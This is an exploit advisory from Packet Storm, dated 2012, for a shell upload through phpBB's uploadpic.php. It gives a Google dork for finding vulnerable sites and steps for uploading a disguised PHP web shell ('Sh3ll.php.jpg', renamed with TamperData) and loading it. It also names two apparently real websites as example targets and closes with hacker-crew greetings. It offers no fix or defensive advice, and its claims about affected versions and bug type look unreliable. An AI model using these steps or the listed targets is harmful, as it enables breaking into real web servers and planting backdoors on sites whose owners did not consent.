phpBB uploadpic.php Shell Upload

2012-07-13T00:00:00
ID PACKETSTORM:114721
Type packetstorm
Reporter Mr.XpR
Modified 2012-07-13T00:00:00

Description

                                        
                                            `##################################################################  
  
0101010101----010101010101010  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101010101  
01 01------0101 010  
01 01------0101 010  
01 01------0101 010  
01 01------0101 010  
01 01------0101 010  
0101010101----0101 010  
  
##################################################################  
  
[+] Exploit Title : PHP BB Forum Remote File Uploader   
  
[+] Google Dork : inurl:uploadpic.php intext:Powered by phpBB  
  
[+] Autor : Mr.XpR   
  
[+] Version : All Version  
  
[+] Contact : No0PM@yahoo.com  
  
[+] Researcher Team : IRaNHaCK Security Team  
  
[+] Bug Level : RFU (Sql)  
  
[+] Test : 7 , Linux Back Track  
  
##################################################################  
  
  
[+]Exploit  
  
[-] http://Site.CoM/uploadpic.php  
  
[+]INfo Uploadshell (( Sh3ll.php.jpg )) or change log with TamperData To Sh3ll.php  
  
[+]Load Shell  
  
[-] http://xxxxxxxx.de/[folder]/Sh3ll.php  
  
[+]Example :  
  
[-] http://crazy-growers.de/uploadpic.php  
[-] http://www.povej.net/forum/uploadpic.php  
[-] More In Google ...  
  
  
Persian Gulf For Ever - Tnx To all Persian Hackerz  
  
Bax:  
  
Siamak Black - UnknowN - Farbod ezrael - Hellboy - Samim.s - Sianor - IRH - IRBH - IRIST - All IRanian Hackers  
`